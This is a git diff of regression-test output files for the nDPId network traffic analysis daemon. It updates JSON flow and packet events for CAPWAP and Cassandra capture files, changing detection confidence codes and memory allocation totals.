@@ -21,16 +21,16 @@ 00801{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":397,"pkt_type":383,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":397,"pkt_l4_len":0,"thread_ts_msec":1422328966914,"pkt":"AQAMzMzMuDhh8wWsAX+qqgMAAAwgAAK0cl0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAPAAggAAAAABAABjLIABkAEKSNAAAAADwoAAAyyA=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1422329005766,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1422329005766,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":200000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1422329005767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1422329005767,"pkt":"uDhh8wWsJOmzR64gCABFwACOANoAAH8RpGHAqAoJwKgKChR+MFwAegAAABACAAAAAAAAAAACAABlAAABACQAAAPoAAAABQIBAAMAQJYAAAEABAcFZgAAQJYAAAAABAEAAAEABAAJQ2lzY28yNTA0BBgABQAAAAAAAAoABsCoCgkAAAAlAAcAQJYAANAAACUACwBAlgAAl1THBF8A"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":200000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":200000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1422329005767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1422329005767,"pkt":"uDhh8wWsJOmzR64gCABFwACOANsAAH8RpGDAqAoJwKgKChR+MFwAegAAABACAAAAAAAAAAACAABlAAABACQAAAPoAAAABQIBAAMAQJYAAAEABAcFZgAAQJYAAAAABAEAAAEABAAJQ2lzY28yNTA0BBgABQAAAAAAAAoABsCoCgkAAAAlAAcAQJYAANAAACUACwBAlgAAl1THBF8A"} 
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1422329015765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1422329015765,"pkt":"JOmzR64guDhh8wWsCABFwABlAAVAAP8R5V7AqAoKwKgKCTBcFH4AURfgAQAAABb+\/wAAAAAAAAAAADgBAAAsAAAAAAAAACz+\/1Z4mrz13vIlLHFGU8KNmBPwkXkcj0vpbAEOfTafYoZSAAAABAAvADMBAA=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1422329017533,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1422329017533,"pkt":"JOmzR64guDhh8wWsCABFwABsAAFAAEARpFzAqAoKwKgKCTBcFH8AWAAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFKDMU3RsAQJYlAAEcq6fyE50AAEcACwAFJ\/9UIA8C1d0="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1422329018033,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1422329018033,"pkt":"JOmzR64guDhh8wWsCABFwADDAAJAAEARpATAqAoKwKgKCTBcFH8ArwAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFL9Qy3RsAQJYlAAEcq6fyE50AAEkACwAFKFJLQAQC3ePdGwBAliUAARyrp\/ITnQAAHQALAAUtdhsgDQK\/xN0bAECWJQABHKun8hOdAAAOAAsABS9iq+AIAt7o3RsAQJYlAAEcq6fyE50AAAwACwAFL7WkAA0C3+g="} 
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1422329018533,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1422329018533,"pkt":"JOmzR64guDhh8wWsCABFwAEaAANAAEARo6zAqAoKwKgKCTBcFH8BBgAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFN3Va3RsAQJYlAAEcq6fyE50AACMACwAFMGt3IAoC5+ndGwBAliUAARyrp\/ITnQAAEwALAAUwdLNADQLo6d0bAECWJQABZICZPC30AAADAAsABTJ3KPD9AqWm3RsAQJYlAAH4Ht\/dIQ8AAB8ACwAFNejwUJoCvcLdGwBAliUAAfge390hDwAAEgALAAU2FOxglQK9wt0bAECWJQAB+B7f3SEPAAAcAAsABTZHxnCRAr\/A3RsAQJYlAAH4Ht\/dIQ8AAAcACwAFN246sJsCvr4="} 00183{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329034072} 
@@ -40,11 +40,11 @@ 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1422329136181,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1422329136181,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAGlAAP8Rr3rAqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g\/wAAABMAAGYAABQAAQEAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"} 00183{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375,"global_ts_msec":1422329141909} 00790{"packet_event_id":1,"packet_event_name":"packet","packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"thread_ts_msec":1422329141029,"pkt":"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"} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422329141029,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":200000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1422329141029,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":394,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1422328963915,"flow_last_seen":1422328966914,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1422329152529,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":173,"flow_first_seen":1422329017533,"flow_last_seen":1422329175528,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":26636,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":173,"flow_first_seen":1422329017533,"flow_last_seen":1422329175528,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":26636,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","packets-captured":422,"packets-processed":397,"total-skipped-flows":0,"total-l4-payload-len":81835,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":48,"global_ts_msec":1422329175528} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 422/397 @@ -54,9 +54,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5885140 bytes -~~ total memory freed........: 5885140 bytes -~~ total allocations/frees...: 118525/118525 +~~ total memory allocated....: 6018774 bytes +~~ total memory freed........: 6018774 bytes +~~ total allocations/frees...: 121287/121287 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 186 chars ~~ json string max len.......: 806 chars diff --git a/test/results/cassandra.pcap.out b/test/results/cassandra.pcap.out index e2de6fc78..e7cfc4209 100644 --- a/test/results/cassandra.pcap.out +++ b/test/results/cassandra.pcap.out 
@@ -4,14 +4,14 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"} 